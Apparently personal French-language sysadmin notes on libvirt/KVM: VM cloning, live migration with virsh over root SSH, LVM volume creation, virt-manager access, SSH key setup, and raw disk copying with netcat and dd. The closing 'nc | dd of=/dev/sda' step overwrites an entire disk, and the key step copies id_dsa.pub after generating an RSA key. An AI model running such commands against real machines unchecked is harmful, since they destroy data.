Copie de maja                                                                  | 8.0 GB     02:42     
Copie de maja-swap                                                             | 2.0 GB     00:40     

Le clone « maja2 » est créé avec succès.

migration de VM avec libvirt

L’idée est de réaliser une migration à chaud de la VM maja vers un hôte distant :
*** faire une sauvegarde de la VM (avec le stockage!) avant ***

Lien vers la documentation officielle : http://libvirt.org/migration.html

Utilisation de la commande « migrate » :

$ virsh
Welcome to virsh, the virtualization interactive terminal.
 
Type:  'help' for help with commands
       'quit' to quit

virsh # help migrate
  NOM
    migrate - migrer un domaine vers un autre hôte

  SYNOPSIS
    migrate [--live] [--p2p] [--direct] [--tunnelled] [--persistent] [--undefinesource] [--suspend] [--copy-storage-all] [--copy-storage-inc] [--change-protection] [--verbose]   [] [] [--timeout ] [--xml ]

  DESCRIPTION
    Migrer un domaine vers un autre hôte. Ajouter « --live » pour une migration pendant l'exécution.
virsh # exit

Phase « avant » la migration :

machine locale # virsh list
 ID Nom                  État
----------------------------------
  9 maja                 en cours d'exécution

On sauvegarde le domaine (par précaution) :

machine locale # virsh dumpxml 9 > maja.xml

Le stockage de la VM doit être aussi accessible depuis l’hôte distante (c’est à dire l’hôte cible)! D’ailleurs ne pas oublier de faire une sauvegarde du stockage..

Migration :

machine locale # virsh migrate --live --persistent maja qemu+ssh://machine-distante/system

Attention, dans cette configuration simpliste, il est nécessaire que l’on puisse accéder à la machine distante en SSH ave l’utilisateur root… voir plus bas pour savoir comment éviter ça…

Une fois migrée, on peut lister les VM sur l’hôte distante depuis la machine locale :

machine locale # virsh -c qemu+ssh://machine-distante/system list 
 ID Nom                  État
----------------------------------
  10 maja                 en cours d'exécution
machine locale #

Si on avait voulu migrer le stockage, je n’ai pas d’autre solution que d’utiliser dd (voir les commandes au dessus). Avant de faire une restauration sur l’hôte cible, on prépare l’emplacement des disques (identique à la machine locale) :

# lvcreate -L 8G -n maja virtvol
# lvcreate -L 2G -n maja-swap virtvol

Puis, toujours sur la machine distante, on commence la création de la VM de la même façon que la VM que l’on va cloner (sans aller jusqu’au bout) :

# virt-install --name=maja --ram=2048 --vcpus=2 --disk path=/dev/virtvol/maja --disk path=/dev/virtvol/maja-swap --vnc --cdrom=/isos/debian-6.0.4-amd64-netinst.iso --os-type=linux --os-variant=debianSqueeze --network=bridge:br0 --hvm --keymap=fr

Ou bien on peut la créer à partir du dump de la configuration faite précédemment :

machine locale # virsh dumpxml 9 > maja.xml
machine distante # virsh create maja.xml

surveillance des performances

# apt-get install virt-top

gestion graphique

alenorcy@machine-desktop:$ sudo apt-get install virt-manager

Sur l’hôte distant, ajout de l’utilisateur alenorcy au groupe libvirtd :

# adduser alenorcy libvirtd

à noter (pour un retour en arrière) : pour retirer un utilisateur d’un groupe, on peut utiliser vigr (avec l’option -s pour /etc/shadow) :

# groups alenorcy
alenorcy : alenorcy adm cdrom sudo dip plugdev lpadmin sambashare libvirtd
# vigr 
Vous avez modifié /etc/group.
Pour des raisons de cohérence, vous devriez modifier /etc/gshadow.
Veuillez utiliser la commande « vigr -s » pour le faire.
# vigr -s
Vous avez modifié /etc/gshadow.
Pour des raisons de cohérence, vous devriez modifier /etc/group.
Veuillez utiliser la commande « vigr » pour le faire.
# groups alenorcy
alenorcy : alenorcy adm cdrom sudo dip plugdev lpadmin sambashare

mécanisme permettant la connexion ssh automatique (sans passphrase)

alenorcy@machine-locale:$ ssh-keygen -t rsa
alenorcy@machine-locale : cat ~/.ssh/id_dsa.pub | ssh machine-distante "cat - >> ~/.ssh/authorized_keys"

On lance l’interface :

alenorcy@machine-locale:$ virt-manager &

Attention, virt-manager (en tous les cas ma version cf ci-dessous) ne permet le clonage a priori que pour des VM de type « fichier » (et non des volumes logiques).. certainement par ce qu’il doit utiliser l’option –auto-clone..

La version de virt-manager sur Ubuntu 12.04 LTS :

dpkg -l | grep virt-manager
ii  virt-manager                                                0.9.1-1ubuntu5.1                            desktop application for managing virtual machines

Copie par le réseau avec netcat et dd

Sur le slave :

nc -l -p 10000 | dd of=/dev/sda

Sur le master :

dd if=/dev/sda | nc 192.168.0.2 10000